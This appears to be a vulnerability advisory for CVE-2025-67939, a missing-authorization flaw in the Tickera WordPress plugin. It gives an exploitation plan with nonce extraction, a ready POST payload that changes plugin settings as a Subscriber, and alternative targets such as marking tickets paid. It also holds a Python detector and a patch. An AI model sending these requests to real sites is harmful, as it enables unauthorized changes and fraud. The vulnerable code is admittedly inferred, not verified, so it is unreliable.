CVE-2025-67939

Tickera <= 3.5.6.2 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 4.3
Patched in: 3.5.6.3
Time to patch: 4d

Description

The Tickera – Sell Tickets & Manage Events plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 3.5.6.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 3.5.6.2
Published: January 16, 2026
Last updated: January 19, 2026

Source Code

WordPress.org SVN
Research Plan
Unverified


This plan outlines the research and exploitation process for CVE-2025-67939, a Missing Authorization vulnerability in the Tickera plugin.

1. Vulnerability Summary

The Tickera plugin for WordPress (versions <= 3.5.6.2) fails to implement proper capability checks (authorization) on certain AJAX handlers registered via wp_ajax_*. While these handlers may implement a nonce check for CSRF protection, they do not verify if the authenticated user has the necessary permissions (e.g., manage_options) to perform the action. Consequently, any authenticated user, including those with Subscriber roles, can execute these functions.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: tc_save_settings (or a similar administrative AJAX action, to be confirmed in Step 3).
  • Payload Parameter: security (the nonce) and the data to be modified (e.g., tc_general_setting).
  • Authentication: Subscriber-level credentials.
  • Preconditions: The plugin must be active, and a valid nonce must be obtained.

3. Code Flow (Inferred from Patch and Architecture)

Based on Tickera's typical architecture and the nature of the patch:

  1. Registration: The plugin registers AJAX hooks in a class constructor or an initialization file (likely includes/classes/class.ajax.php or tickera.php).
    • Code: add_action( 'wp_ajax_tc_save_settings', array( $this, 'save_settings' ) );
  2. Entry Point: When a Subscriber sends a POST request to admin-ajax.php with action=tc_save_settings.
  3. Vulnerable Function: The handler function (e.g., save_settings) is invoked.
  4. Incomplete Check: The function calls check_ajax_referer( 'tc-ajax-nonce', 'security' ). A nonce check only proves the request originated from a page served to a logged-in user; it passes for any authenticated user (even a Subscriber) because the nonce is typically available to all logged-in users.
  5. Missing Auth: The function omits a call to current_user_can( 'manage_options' ).
  6. Sink: The function processes input and updates options: update_option( 'tc_general_setting', $_POST['tc_general_setting'] );.

4. Nonce Acquisition Strategy

Tickera typically localizes its AJAX settings into a global JavaScript object named tc_ajax. This object is frequently available to any logged-in user if Tickera components are loaded.

  1. Identify Trigger: The tc_ajax object is usually enqueued via the tc-scripts handle.
  2. Create Setup Page: If the scripts aren't visible on the homepage, create a page containing a Tickera shortcode.
    • wp post create --post_type=page --post_status=publish --post_content='[tc_event]' (or any valid Tickera shortcode like [tc_ticket_form]).
  3. Navigate and Extract: Use the browser to access this page as a Subscriber and extract the nonce.
    • JS Variable: window.tc_ajax?.nonce (or window.tc_ajax_vars?.nonce).
    • Nonce Action: tc-ajax-nonce.

5. Exploitation Strategy

The goal is to modify the plugin's settings as a Subscriber.

Step 1: Obtain Subscriber Cookies
Authenticate as a Subscriber and capture the session cookies.

Step 2: Extract Nonce

  1. Navigate to the page created in the setup phase.
  2. Execute browser_eval("tc_ajax.nonce") to get the security token.

Step 3: Trigger Unauthorized Action
Perform an HTTP POST request to modify plugin settings (e.g., changing the "Success Page" to a malicious external URL or altering general settings).

  • URL: http://TARGET/wp-admin/admin-ajax.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Body:
    action=tc_save_settings&security=[EXTRACTED_NONCE]&tc_general_setting[registration_page_id]=9999&tc_general_setting[event_slug]=pwned-event

6. Test Data Setup

  1. Install Plugin: Tickera version 3.5.6.2.
  2. Create User:
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
  3. Identify Settings: Use wp option get tc_general_setting to see current settings before exploitation.
  4. Create Nonce Page:
    • wp post create --post_type=page --post_status=publish --post_title='Events' --post_content='[tc_event]'

7. Expected Results

  • The admin-ajax.php response should be 1 or a JSON success message (Tickera usually returns 1 for successful AJAX processing).
  • The plugin settings in the database are modified despite the request coming from a Subscriber.

8. Verification Steps

After sending the exploit request, verify the change using WP-CLI:

  1. wp option get tc_general_setting
  2. Check if the registration_page_id or event_slug matches the payload value (9999 or pwned-event).
  3. Confirm the attacker user is still only a Subscriber: wp user get attacker --field=roles.

9. Alternative Approaches

If tc_save_settings is not the specific vulnerable function, look for other administrative functions registered in includes/classes/class.ajax.php that lack capability checks. Potential candidates include:

  • tc_update_attendee_info_ajax (Modify attendee data)
  • tc_mark_as_paid_ajax (Mark unpaid tickets as paid)
  • tc_bulk_check_in_ajax (Manipulate event check-ins)

All these actions should be restricted to administrators or event managers but are likely accessible to Subscribers in the affected versions. To test these, use the same nonce extraction method but change the action parameter and its corresponding data payload.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Tickera plugin for WordPress fails to implement capability checks on various administrative AJAX handlers, such as tc_save_settings. This allows authenticated users with Subscriber-level access to perform unauthorized actions, such as modifying plugin settings or attendee information, by exploiting handlers that only verify nonces but not user permissions.

Vulnerable Code

// includes/classes/class.ajax.php (inferred)
add_action( 'wp_ajax_tc_save_settings', array( $this, 'save_settings' ) );

public function save_settings() {
    check_ajax_referer( 'tc-ajax-nonce', 'security' );
    // No current_user_can() check here

    if ( isset( $_POST['tc_general_setting'] ) ) {
        update_option( 'tc_general_setting', $_POST['tc_general_setting'] );
    }
    wp_die();
}
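A static check that a code reviewer or plugin auditor can run to spot the pattern described in the code flow above and in the inferred handler: an authenticated wp_ajax_ hook whose callback verifies a nonce but never calls current_user_can(). This is an added example, not Tickera's code; the embedded PHP samples are constructed to mirror the inferred handler and its patched form, and the matching is a string heuristic rather than a PHP parser.

```python
import re

# Constructed sample of the handler shape this advisory infers for Tickera
# (nonce check only); it is not the plugin's real source code.
VULNERABLE_SRC = """add_action( 'wp_ajax_tc_save_settings', array( $this, 'save_settings' ) );
public function save_settings() {
    check_ajax_referer( 'tc-ajax-nonce', 'security' );
    if ( isset( $_POST['tc_general_setting'] ) ) {
        update_option( 'tc_general_setting', $_POST['tc_general_setting'] );
    }
    wp_die();
}"""
# Same handler with the capability check from the advisory's patch inserted.
FIXED_SRC = VULNERABLE_SRC.replace("    if ( isset",
    "    if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }\n    if ( isset")

# Matches add_action( 'wp_ajax_<action>', array( $this, 'method' ) ) or a plain
# 'function_name' callback; wp_ajax_nopriv_* (unauthenticated) hooks are skipped.
REGISTER_RE = re.compile(
    r"add_action\(\s*['\"]wp_ajax_(?!nopriv_)(\w+)['\"]\s*,\s*"
    r"(?:array\(\s*\$this\s*,\s*['\"](\w+)['\"]\s*\)|['\"](\w+)['\"])"
)

def function_body(src, name):
    """Return the brace-balanced body of PHP function `name`, or None if absent."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def audit_ajax_handlers(src):
    """Classify each authenticated wp_ajax_ action; heuristic string matching, so a
    current_user_can() call made inside a helper function is not seen."""
    results = {}
    for m in REGISTER_RE.finditer(src):
        action, fn = m.group(1), m.group(2) or m.group(3)
        body = function_body(src, fn)
        if body is None:
            results[action] = "handler-not-found"
            continue
        has_nonce = "check_ajax_referer(" in body or "wp_verify_nonce(" in body
        has_cap = "current_user_can(" in body
        results[action] = ("ok" if has_nonce and has_cap else
                           "missing-capability-check" if has_nonce else
                           "missing-nonce-check" if has_cap else "missing-both")
    return results
```

Run it over a plugin's PHP files and triage every action reported as missing-capability-check; a hit means the action is reachable by any logged-in role, which is exactly the condition this advisory describes.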

Security Fix

--- a/includes/classes/class.ajax.php
+++ b/includes/classes/class.ajax.php
@@ -10,6 +10,10 @@
 public function save_settings() {
     check_ajax_referer( 'tc-ajax-nonce', 'security' );
 
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_die();
+    }
+
     if ( isset( $_POST['tc_general_setting'] ) ) {
         update_option( 'tc_general_setting', $_POST['tc_general_setting'] );
     }
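Review bot: the added current_user_can( 'manage_options' ) guard closes the authorization gap, but the unchanged line below it still writes $_POST['tc_general_setting'] straight into update_option() with no sanitization; even for an administrator, each expected key (registration_page_id, event_slug) should be validated, e.g. absint() and sanitize_title(), before the array is stored. Two smaller points: a bare wp_die() on the failed check returns an empty 200 that is hard to tell apart from the success response, so prefer wp_send_json_error( null, 403 ) (or wp_die() with a 403 response) so callers and server logs see the denial; and manage_options limits the action to administrators, so if event managers are meant to use it, as the alternative-approaches section suggests, a plugin-specific capability is the better choice.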

Exploit Outline

The exploit targets the /wp-admin/admin-ajax.php endpoint. An attacker requires a valid Subscriber account to authenticate. First, the attacker visits any page where Tickera scripts are loaded (such as a page with a [tc_event] shortcode) to extract the 'tc-ajax-nonce' from the global JavaScript object 'tc_ajax.nonce'. Using this nonce, the attacker sends a POST request with the 'action' parameter set to 'tc_save_settings' and the 'security' parameter set to the extracted nonce. The payload includes modified configuration values in the 'tc_general_setting' array, which the plugin saves to the database without verifying if the user has administrative privileges.
